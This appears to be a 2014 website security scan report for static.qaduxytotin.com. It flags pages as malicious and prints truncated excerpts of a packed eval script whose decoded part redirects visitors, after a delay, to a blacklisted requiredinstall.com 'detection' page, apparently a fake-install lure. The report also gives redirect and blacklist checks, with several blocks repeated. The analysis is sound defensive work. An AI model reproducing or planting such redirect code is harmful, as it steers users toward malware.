Scanned pages/files
Request | Server response | Status |
http://static.qaduxytotin.com/static.qaduxytotin.com | 200 OK Content-Length: 35960 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.requiredinstall.com. The script is delivered inside an eval(function(p,a,c,k,e,d){...}) packer wrapper, so its contents are readable only after unpacking; in the decoded excerpt below, the visible campaign objects (tug1Camp, tug2Camp) each define a write() function that schedules a client-side redirect by assigning document.location.href after a 2000 ms delay. Packed script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('x(1b 1f==="V"||1f==U){1f=R}B 5k(4x){f 5s="aU"+"aX"+"cC"+"cs+/"+"=";f 3o="";f 6e,5Z,6X="";f 6E,5R,5p,5U="";f i=0;do{6E=5s.1A( ...[3793 bytes skipped]... Decoded script: ...[29329 bytes skipped]... rb?id=390008"],"XX":["https://secure.adnxs.com/clktrb?id=390007","https://secure.adnxs.com/clktrb?id=389979","https://secure.adnxs.com/clktrb?id=390008"]};var cc=getCountryCode();var opts=geoMap["MX"];var rand=Math.floor(Math.random()*opts.length);var u=opts[rand];setTimeout('document.location.href = "'+u+'";',2000)};var tug1Camp={};tug1Camp.slug="tug1";tug1Camp.weight=55;tug1Camp.countries="*";tug1Camp.write=function(){var u="http://www.requiredinstall.com/SuxgELn6/detection/n/?source=1";setTimeout('document.location.href = "'+u+'";',2000)};var tug2Camp={};tug2Camp.slug="tug2";tug2Camp.weight=55;tug2Camp.countries="*";tug2Camp.write=function(){var u="http://www.requiredinstall.com/SuxgELn6/detection/n/?source=2";setTimeout('document.location.href = "'+u+'";',2000)};var ism1Camp={};ism1Camp.slug="ism1";ism1Camp.weight=55;ism1Camp.countries="*";ism1Camp.write=function(){var u="http://exchange.admailtiser.com/WhiteLabelBidRequestHan ...[81102 bytes skipped]... | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://bits.wikimedia.org/geoiplookup | 200 geoiplookup Content-Length: 96 Content-Type: text/javascript | clean |
http://static.qaduxytotin.com/ | 200 OK Content-Length: 35960 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.requiredinstall.com eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('x(1b 1f==="V"||1f==U){1f=R}B 5k(4x){f 5s="aU"+"aX"+"cC"+"cs+/"+"=";f 3o="";f 6e,5Z,6X="";f 6E,5R,5p,5U="";f i=0;do{6E=5s.1A( ...[3793 bytes skipped]... Decoded script: ...[29329 bytes skipped]... rb?id=390008"],"XX":["https://secure.adnxs.com/clktrb?id=390007","https://secure.adnxs.com/clktrb?id=389979","https://secure.adnxs.com/clktrb?id=390008"]};var cc=getCountryCode();var opts=geoMap["MX"];var rand=Math.floor(Math.random()*opts.length);var u=opts[rand];setTimeout('document.location.href = "'+u+'";',2000)};var tug1Camp={};tug1Camp.slug="tug1";tug1Camp.weight=55;tug1Camp.countries="*";tug1Camp.write=function(){var u="http://www.requiredinstall.com/SuxgELn6/detection/n/?source=1";setTimeout('document.location.href = "'+u+'";',2000)};var tug2Camp={};tug2Camp.slug="tug2";tug2Camp.weight=55;tug2Camp.countries="*";tug2Camp.write=function(){var u="http://www.requiredinstall.com/SuxgELn6/detection/n/?source=2";setTimeout('document.location.href = "'+u+'";',2000)};var ism1Camp={};ism1Camp.slug="ism1";ism1Camp.weight=55;ism1Camp.countries="*";ism1Camp.write=function(){var u="http://exchange.admailtiser.com/WhiteLabelBidRequestHan ...[81102 bytes skipped]... | ||
http://static.qaduxytotin.com/test404page.js | 200 OK Content-Length: 35960 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.requiredinstall.com eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('x(1b 1f==="V"||1f==U){1f=R}B 5k(4x){f 5s="aU"+"aX"+"cC"+"cs+/"+"=";f 3o="";f 6e,5Z,6X="";f 6E,5R,5p,5U="";f i=0;do{6E=5s.1A( ...[3793 bytes skipped]... Decoded script: ...[29329 bytes skipped]... rb?id=390008"],"XX":["https://secure.adnxs.com/clktrb?id=390007","https://secure.adnxs.com/clktrb?id=389979","https://secure.adnxs.com/clktrb?id=390008"]};var cc=getCountryCode();var opts=geoMap["MX"];var rand=Math.floor(Math.random()*opts.length);var u=opts[rand];setTimeout('document.location.href = "'+u+'";',2000)};var tug1Camp={};tug1Camp.slug="tug1";tug1Camp.weight=55;tug1Camp.countries="*";tug1Camp.write=function(){var u="http://www.requiredinstall.com/SuxgELn6/detection/n/?source=1";setTimeout('document.location.href = "'+u+'";',2000)};var tug2Camp={};tug2Camp.slug="tug2";tug2Camp.weight=55;tug2Camp.countries="*";tug2Camp.write=function(){var u="http://www.requiredinstall.com/SuxgELn6/detection/n/?source=2";setTimeout('document.location.href = "'+u+'";',2000)};var ism1Camp={};ism1Camp.slug="ism1";ism1Camp.weight=55;ism1Camp.countries="*";ism1Camp.write=function(){var u="http://exchange.admailtiser.com/WhiteLabelBidRequestHan ...[81102 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: static.qaduxytotin.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 29 Oct 2014 09:42:30 GMT
Server: nginx/1.1.19
Content-Type: text/html
X-Cache: HIT
X-Powered-By: PHP/5.4.26
GET / HTTP/1.1
Host: static.qaduxytotin.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 29 Oct 2014 09:42:30 GMT
Server: nginx/1.1.19
Content-Type: text/html
X-Cache: HIT
X-Powered-By: PHP/5.4.26
Second query (visit from search engine):
GET / HTTP/1.1
Host: static.qaduxytotin.com
Referer: http://www.google.com/search?q=static.qaduxytotin.com
Result:
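The response is the same as for the first query; no referrer-dependent redirect was found. Note that this check appears to compare only the HTTP responses: the delayed document.location.href redirects in the decoded script under "Scanned pages/files" run in the browser and would not show up here.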
GET / HTTP/1.1
Host: static.qaduxytotin.com
Referer: http://www.google.com/search?q=static.qaduxytotin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=static.qaduxytotin.com
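Result: This site is not currently listed as suspicious. (Absence from this list does not contradict the "malicious" verdict under "Scanned pages/files"; a blacklist lookup reports only whether the site has already been listed.)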
Query: http://yandex.com/infected?l10n=en&url=http://static.qaduxytotin.com/
Result: static.qaduxytotin.com is not infected or malware details are not published yet.
Result: static.qaduxytotin.com is not infected or malware details are not published yet.